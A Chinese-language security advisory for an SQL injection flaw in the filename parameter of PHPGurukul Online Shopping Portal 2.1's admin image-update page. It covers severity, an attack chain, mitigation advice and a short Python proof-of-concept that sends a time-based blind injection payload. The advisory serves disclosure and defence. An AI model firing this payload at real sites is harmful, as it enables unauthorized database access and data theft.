CVE-2026-5641 CVSS 6.3 中危

CVE-2026-5641 PHPGurukul在线购物门户SQL注入漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5641

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PHPGurukul Online Shopping Portal Project

漏洞概述

PHPGurukul Online Shopping Portal Project 2.1版本被发现存在SQL注入漏洞。该漏洞位于/admin/update-image1.php文件的参数处理组件中。由于对用户输入的filename参数未进行充分的过滤，攻击者可构造恶意SQL语句进行注入。此漏洞允许远程低权限攻击者在无需用户交互的情况下利用，可能导致敏感信息泄露、数据完整性受损及服务可用性下降。

技术细节

该漏洞的核心原因在于PHPGurukul Online Shopping Portal Project 2.1版本在处理图片更新请求时，缺乏对用户输入参数的有效安全过滤。受影响文件为/admin/update-image1.php，其中的参数处理组件直接将用户可控的filename参数拼接到后端SQL查询语句中，导致经典的SQL注入漏洞。攻击者无需复杂的用户交互，只需具备低权限账户（PR:L），即可通过网络向该接口发送恶意构造的数据包。利用方式通常包括在filename参数中插入SQL元字符（如单引号、UNION SELECT、布尔盲注语句等），欺骗数据库服务器执行非预期的命令。成功的利用可能允许攻击者绕过认证、提取管理员密码哈希、篡改商品订单数据，甚至在特定条件下获取服务器文件系统访问权限，严重威胁系统的机密性、完整性和可用性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标运行PHPGurukul Online Shopping Portal Project 2.1，并定位到/admin/update-image1.php接口。

STEP 2

2. 获取低权限

根据CVSS向量PR:L，攻击者注册或获取一个普通用户/低权限账户的会话凭证。

STEP 3

3. 构造攻击载荷

攻击者构造包含恶意SQL代码的filename参数，旨在绕过输入验证并修改SQL查询逻辑。

STEP 4

4. 发送恶意请求

攻击者向目标服务器发送包含恶意filename参数的POST或GET请求至漏洞端点。

STEP 5

5. 执行SQL注入

后端数据库执行注入的SQL语句，攻击者据此提取、篡改或删除数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-ip/admin/update-image1.php"

# Attacker controlled payload for 'filename' parameter
# Using time-based blind SQL injection technique
sqli_payload = "../../../images/product' OR SLEEP(5)-- -"

cookies = {
    "PHPSESSID": "attacker_session_id" # Requires low privilege (PR:L)
}

data = {
    "filename": sqli_payload
}

try:
    response = requests.post(target_url, data=data, cookies=cookies)
    # Check response time or content to confirm vulnerability
    print(f"Status Code: {response.status_code}")
    print(f"Response Time: {response.elapsed.total_seconds()} seconds")
except Exception as e:
    print(f"Error: {e}")

影响范围

PHPGurukul Online Shopping Portal Project 2.1

防御指南

临时缓解措施

在未升级修复前，建议通过Web应用防火墙（WAF）部署规则，拦截针对/admin/update-image1.php文件中filename参数的异常SQL语法请求；同时在服务器端对文件名参数进行强制类型检查（例如仅允许字母数字和特定符号），并限制该接口的访问权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5641
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5641
3 Details https://www.cvedetails.com/cve/CVE-2026-5641/
4 VulDB https://vuldb.com/cve/CVE-2026-5641
5 Link https://github.com/f1rstb100d/CVE/issues/19
6 Link https://phpgurukul.com/
7 Link https://vuldb.com/submit/785993
8 Link https://vuldb.com/vuln/355429
9 Link https://vuldb.com/vuln/355429/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表